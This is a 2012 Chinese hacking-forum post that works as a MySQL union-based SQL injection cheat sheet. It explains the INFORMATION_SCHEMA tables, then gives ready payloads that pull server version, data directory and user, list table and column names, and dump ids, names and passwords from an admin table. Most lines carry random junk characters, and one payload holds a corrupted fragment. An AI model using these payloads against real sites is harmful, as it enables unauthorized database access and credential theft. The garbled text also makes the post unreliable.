找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1851|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法
, w, n4 a. T/ ]; Z. S( d8 _+ \' B- i, n8 K5 C/ H4 t# Z
学习盲注前先了解下 IFORMATION_SCHEMA 库
$ T& V) l5 w1 b1 _4 P& t5 w& J: x( F
! W( g- k2 U5 P/ _  A, XMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
# Q! k) F) s3 {3 W' G# Y存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。6 ^: h" }6 T+ V9 t% h4 K9 _# k6 z
1.得到所有数据库名:
( _. c, \( W7 A$ Q2 f- {! \|SCHEMATA ->存储数据库名的表7 M- }) A% }5 F
|---字段:SCHEMA_NAME ->数据库名称
5 \7 M& b, L* B% K
% V; j; e# j6 E/ Z7 P2 Z0 _4 [! N- j|TABLES ->存储表名- {/ w# `* n7 ?5 G2 ]' [4 _) G) L
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
. k  R, }1 D1 ~3 D  G3 t! H|---字段:TABLE_NAME ->存储表的表名
% B" M5 K9 z. S6 R  |* \2 i
- e6 d3 R+ b( i" n0 ?5 b' G! K|COLUMNS ->存储的字段名表
  }$ |" V4 `0 D0 }2 j" S|---字段:TABLE_SCHEMA ->该字段所属数据库名
; N1 W9 R4 N1 f9 j4 j- W|---字段:TABLE_NAME ->存储所属表的名称# f& ~; {2 r) C( H3 X" F

1 z% i, Z# \0 q# b7 q1 N5 o/ Y|---字段:COLUMN_NAME ->该字段的名称
" F, Q$ L+ s( \2 @  G3 e) A$ k, a1 z" S" q
; q/ x% h  \9 ?& }' S

9 i- A. h8 a. m% h###########################################################################) a; h6 m& F* ^7 B  P- a

9 u. G) D! z9 ~" E' l' R& G0x001 获取系统信息:
$ n" Q4 c: r* L+ I6 R3 G' `
6 M* J8 Q9 o% A- junion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
# I* y  {0 B5 v# r) b$ l% o5 Z& a! S) Y* e; ?- N
/*! y% j3 S. D9 p. r# _
2 `$ j: R: H/ V2 d  |9 b
@@global.version_compile_os 获取系统版本
6 T4 v! d5 |2 [! U! }$ G
7 @+ b  ~1 N# J7 x! V9 }/ [@@datadir 数据库路径
/ e+ W- ]  L# Bdatabase() 当前数据库名称% L7 z5 D( i: v. w- K! L; T
0x3c62723e 换行HEX值! q- ]; W! E1 W

/ B& E& C8 ]- \; ?8 N3 B3 }*/
) O' \8 Q" h$ s! p
: B% `# E2 `- S- f: @; o7 X
: _" }! h) D( j4 V$ M# ~6 f
9 l0 g9 E' C  s0 ^5 j  z######################################################################
+ o- a$ P# p" w7 Q* R. Q( ^5 n5 R% i4 b
0x002 获取表名- F+ V1 y0 F0 c  q# ?, z

( k# l) q: _) G1 Z' Gunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
3 Q6 e4 f0 C; {6 E% i  R2 D0 X. M* _9 D! e

5 R3 p# V! v; a3 M1 t7 s' n7 f$ p  {$ I: d  a( [
/*
: n; p) I! H! ?. g, X( h2 U/ Y
1 E! E4 z, u2 D  D, A0x67617264656e 为当前数据库名4 f* q# h$ j2 n" U$ y

1 L  f* D" @( Y; H+ }group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
( p0 J( h0 v3 M! I) P# p2 |+ N% c5 {: n, r7 o8 y
*/
  G. ?5 s5 g! g* x; p
6 s; N9 Z7 e% q4 i) a4 }######################################################################4 V- O' d, @6 d- S% y; X

/ s. A1 q7 D0 q, w + q3 [% o( I: O# Q( F

  |" x& x( e6 x( a2 s6 t0x003 获取字段! w: ?" K' H! P# k% p& v/ o1 h% ~

; H  \$ u2 Y$ g" `6 x2 p; m- Wunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*  s  ?5 x  V' ?

" e5 N# l. {( [7 S, _3 G( j/*
) Y5 ?- g  a! }) a: U$ B; B# n$ O% K* g
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段' B: R, y: Y) `0 R8 y" p
* a- ~3 p" m. B) D
0x61646d696e ->选择一个表
' M% c* y9 E" }' ~/ }0 y/ S
7 W, K9 V7 B9 A# R% [9 x0x67617264656e ->数据库名  U0 e9 K/ L9 G8 {' }6 m- d

9 y1 h+ t  U/ r* U4 f. c; q*// G$ J: w9 \* x2 P+ j* F7 V
# w& P4 f  g2 X1 O2 ]% w9 W
#####################################################################  e: ~! r; R, c# u
% q9 Y& Y& r1 e9 G  \( i) y1 l. g
* Q/ [' \7 G" U

! _6 F5 i/ R* m4 m! m0x004 获取数据
) W8 U1 [& \. W5 \- w
+ x7 v# M0 ]4 k/ V4 W& Uunion select 1,2,3
0 m; T9 c' g- H3 |,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin9 t+ Z5 U5 X9 n5 e

! v9 B7 E( N$ b3 r- `0 Yunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin6 V% Q2 o) @( @
' K8 E3 r) [0 z

; A2 w2 @& T7 ~9 g# p: @5 [, ?; u( C' S4 F# X. J7 K  n) v
/*, q) ~, l9 p3 N+ f( k4 p
2 j" n% C: I! I3 R) t; ^
0x3c62723e 换行符号HEX编码
# ?. j2 s8 W6 X3 w+ \, }0 _$ I% O5 c& F
group_concat 同时获得该字段所有数据
9 a1 b; f) f( X/ ]5 }# F- z
* M/ _: V+ u, T% n: M*/" B8 y2 R$ ~4 c4 U9 g  @
  E6 w. k$ K  b. Y' P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表